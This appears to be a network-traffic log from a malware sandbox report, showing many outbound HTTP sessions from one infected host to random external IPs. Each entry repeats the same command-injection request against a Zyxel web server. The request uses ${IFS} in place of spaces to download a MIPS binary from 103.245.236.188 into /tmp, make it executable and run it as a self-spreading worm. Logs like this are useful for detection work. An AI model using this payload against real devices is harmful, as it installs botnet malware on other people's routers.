                                                Jan 12, 2024 18:16:35.739952087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7460192.168.2.2351086207.248.71.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.739990950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7461192.168.2.234868287.153.152.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740055084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7462192.168.2.2360022203.14.191.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740091085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7463192.168.2.2341620217.163.229.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740148067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7464192.168.2.2355006170.242.42.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740184069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7465192.168.2.235089431.192.74.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740226984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7466192.168.2.2346460211.80.9.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740318060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7467192.168.2.2351804159.132.35.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740359068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7468192.168.2.2353450170.10.183.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740410089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7469192.168.2.2342496185.17.44.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740489960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7470192.168.2.2349386170.169.35.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740503073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7471192.168.2.2351292173.107.194.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740545034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7472192.168.2.2349826173.117.120.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740582943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7473192.168.2.234659050.20.224.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740624905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7474192.168.2.235702698.81.101.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740664959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7475192.168.2.2337982187.164.79.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740725040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7476192.168.2.2337032179.220.37.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740761995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7477192.168.2.2357238219.168.198.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740808010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7478192.168.2.235979451.20.59.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740833998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7479192.168.2.2342520201.227.233.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740864992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7480192.168.2.2332934200.172.52.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740891933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7481192.168.2.2350904170.156.127.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.740925074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7482192.168.2.2337998160.73.164.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741002083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7483192.168.2.234751261.160.34.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741024971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7484192.168.2.2336634169.136.48.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741092920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7485192.168.2.2348360110.171.231.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741125107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7486192.168.2.2354764114.191.181.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741210938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7487192.168.2.2345896118.169.104.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741264105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7488192.168.2.2340912136.15.238.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741291046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7489192.168.2.233575443.130.0.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741380930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7490192.168.2.2344472104.240.108.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741435051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7491192.168.2.2337068152.179.190.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741467953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7492192.168.2.2360938172.223.245.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741497993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7493192.168.2.2337634129.97.241.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741524935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7494192.168.2.2345024130.211.172.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741564989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7495192.168.2.235741459.244.83.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741592884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7496192.168.2.2338954178.122.133.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741652966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7497192.168.2.235538814.119.72.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741678953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7498192.168.2.2339732174.88.236.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741741896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7499192.168.2.2336392181.120.61.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741799116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7500192.168.2.2333390134.221.44.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741828918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7501192.168.2.2360330187.43.106.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741897106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7502192.168.2.233515866.150.4.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741951942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7503192.168.2.233514452.47.207.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.741987944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7504192.168.2.234635218.145.192.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742033958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7505192.168.2.2340120179.70.217.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742053986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7506192.168.2.234921238.53.144.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742078066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7507192.168.2.2335738182.227.198.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742158890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7508192.168.2.233481442.159.109.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742194891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7509192.168.2.233984440.191.26.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742257118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7510192.168.2.2341432123.236.171.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742320061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7511192.168.2.233473635.240.155.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742393970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7512192.168.2.2356118144.28.26.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742434978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7513192.168.2.235581291.121.194.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742501020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7514192.168.2.23366244.124.178.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742547035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7515192.168.2.235556277.50.212.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742594957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7516192.168.2.234939031.195.64.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742659092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7517192.168.2.233628857.192.99.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742712021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7518192.168.2.233291668.74.223.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742737055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7519192.168.2.235026866.81.39.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742764950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7520192.168.2.2343584155.100.223.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742821932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7521192.168.2.234419477.195.129.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.742883921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7522192.168.2.2358302169.247.0.192443
                                                TimestampBytes transferredDirectionData
